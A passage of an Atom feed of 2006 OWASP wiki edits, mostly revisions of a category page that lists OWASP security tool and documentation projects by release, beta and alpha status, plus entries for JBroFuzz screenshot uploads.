&amp;lt;table valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]&lt;br /&gt;
: a JavaScript based web application security testing suite&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]&lt;br /&gt;
: a new project focused on the development of encoding best practices for web applications.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]&lt;br /&gt;
: an Eclipse-based source-code static analysis tool for Java&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]&lt;br /&gt;
: a CD containing ready to use versions of application security analysis and testing tools&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP .NET Project|OWASP .NET Research]]&lt;br /&gt;
: a project focused on helping .NET developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]&lt;br /&gt;
: a project focused on combining automated capabilities with complete manual testing to get the best results&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]&lt;br /&gt;
: an open source black box security scanner used to assess the security of AJAX-enabled applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]&lt;br /&gt;
: a project focused on the development of SQLiX, a full perl-based SQL scanner&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]&lt;br /&gt;
: a project focused on the development of WSFuzzer, a full python-based Web Services SOAP fuzzer&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]&lt;br /&gt;
: a project focused on defining process elements that reinforce application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]&lt;br /&gt;
: a new project to capture best practices for reviewing code&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Testing Project|OWASP Testing Guide]]&lt;br /&gt;
: a project focused on application security testing procedures and checklists&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Tools Project|OWASP Tools Project]]&lt;br /&gt;
: The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Alpha Status Projects==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]&lt;br /&gt;
: a web application that includes common web application vulnerabilities&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]&lt;br /&gt;
: a fuzzer application, supporting a number of automated security checks including basic cross site scripting checks (XSS) as well as basic SQL injection testing.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]&lt;br /&gt;
: a project focused on the development of a flexible code review engine&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Validation Project|OWASP Validation Project]]&lt;br /&gt;
: a project that provides guidance and tools related to validation&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]&lt;br /&gt;
: investigating the security of AJAX enabled applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]&lt;br /&gt;
: establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]&lt;br /&gt;
: identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security  &lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]&lt;br /&gt;
: The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Guide]]&lt;br /&gt;
: a comprehensive and integrated guide to the fundamental building blocks of application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Java Project|OWASP Java Project]]&lt;br /&gt;
: a project focused on helping Java and J2EE developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Logging Project|OWASP Logging Guide]]&lt;br /&gt;
: a project to define best practices for logging and log management&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP PHP Project|OWASP PHP Project]]&lt;br /&gt;
: a project focused on helping PHP developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Risk Management Project|OWASP Risk Management Project]]&lt;br /&gt;
: a new project focused on processes for managing application security risk&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WASS Project|OWASP WASS Guide]]&lt;br /&gt;
: a standards project to develop more concrete criteria for secure applications&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Project&amp;diff=13336</id>
		<title>Category:OWASP Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Project&amp;diff=13336"/>
				<updated>2006-11-19T23:21:17Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* Alpha Status Projects */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.&lt;br /&gt;
&lt;br /&gt;
To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]&lt;br /&gt;
&lt;br /&gt;
Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release Quality Projects==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]&lt;br /&gt;
: an online training environment for hands-on learning about application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]&lt;br /&gt;
: a tool for performing all types of security testing on web applications and web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]&lt;br /&gt;
: FAQ covering many application security topics&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Guide Project|OWASP Guide Project]]&lt;br /&gt;
: a massive document covering all aspects of web application and web service security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Legal Project|OWASP Legal Research]]&lt;br /&gt;
: a project focused on contracting for secure software&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]&lt;br /&gt;
: an awareness document that describes the top ten web application security vulnerabilities&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Beta Status Projects==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]&lt;br /&gt;
: a JavaScript based web application security testing suite&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]&lt;br /&gt;
: a new project focused on the development of encoding best practices for web applications.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]&lt;br /&gt;
: an Eclipse-based source-code static analysis tool for Java&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]&lt;br /&gt;
: a CD containing ready to use versions of application security analysis and testing tools&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP .NET Project|OWASP .NET Research]]&lt;br /&gt;
: a project focused on helping .NET developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]&lt;br /&gt;
: a project focused on combining automated capabilities with complete manual testing to get the best results&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]&lt;br /&gt;
: an open source black box security scanner used to assess the security of AJAX-enabled applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]&lt;br /&gt;
: a project focused on the development of SQLiX, a full perl-based SQL scanner&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]&lt;br /&gt;
: a project focused on the development of WSFuzzer, a full python-based Web Services SOAP fuzzer&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]&lt;br /&gt;
: a project focused on defining process elements that reinforce application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]&lt;br /&gt;
: a new project to capture best practices for reviewing code&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Testing Project|OWASP Testing Guide]]&lt;br /&gt;
: a project focused on application security testing procedures and checklists&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Tools Project|OWASP Tools Project]]&lt;br /&gt;
: The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Alpha Status Projects==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th width=&amp;quot;50%&amp;quot;&amp;gt;Tools&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Documentation&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]&lt;br /&gt;
: a web application that includes common web application vulnerabilities&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]&lt;br /&gt;
: a fuzzer application, supporting a number of automated security checks including basic&lt;br /&gt;
cross site scripting checks (XSS) as well as basic SQL injection testing.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]&lt;br /&gt;
: a project focused on the development of a flexible code review engine&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Validation Project|OWASP Validation Project]]&lt;br /&gt;
: a project that provides guidance and tools related to validation&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]&lt;br /&gt;
: investigating the security of AJAX enabled applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]&lt;br /&gt;
: establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]&lt;br /&gt;
: identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security  &lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]&lt;br /&gt;
: The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Guide]]&lt;br /&gt;
: a comprehensive and integrated guide to the fundamental building blocks of application security&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Java Project|OWASP Java Project]]&lt;br /&gt;
: a project focused on helping Java and J2EE developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Logging Project|OWASP Logging Guide]]&lt;br /&gt;
: a project to define best practices for logging and log management&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP PHP Project|OWASP PHP Project]]&lt;br /&gt;
: a project focused on helping PHP developers build secure applications&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP Risk Management Project|OWASP Risk Management Project]]&lt;br /&gt;
: a new project focused on processes for managing application security risk&lt;br /&gt;
&lt;br /&gt;
; [[:Category:OWASP WASS Project|OWASP WASS Guide]]&lt;br /&gt;
: a standards project to develop more concrete criteria for secure applications&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Jbrofuzz_small.png&amp;diff=13169</id>
		<title>File:Jbrofuzz small.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Jbrofuzz_small.png&amp;diff=13169"/>
				<updated>2006-11-16T23:30:12Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: JBroFuzz Screenshot (Small)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;JBroFuzz Screenshot (Small)&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Jbrofuzz.png&amp;diff=13168</id>
		<title>File:Jbrofuzz.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Jbrofuzz.png&amp;diff=13168"/>
				<updated>2006-11-16T23:25:05Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: JBroFuzz Screenshot&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;JBroFuzz Screenshot&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:0.2-Screenshot.png&amp;diff=12547</id>
		<title>File:0.2-Screenshot.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:0.2-Screenshot.png&amp;diff=12547"/>
				<updated>2006-11-14T01:45:07Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: A screenshot of JBroFuzz 0.2 in action!&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;A screenshot of JBroFuzz 0.2 in action!&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:0.2-splash.jpg&amp;diff=12546</id>
		<title>File:0.2-splash.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:0.2-splash.jpg&amp;diff=12546"/>
				<updated>2006-11-14T01:42:31Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: Splash Screen of JBroFuzz 0.2&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Splash Screen of JBroFuzz 0.2&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	</feed>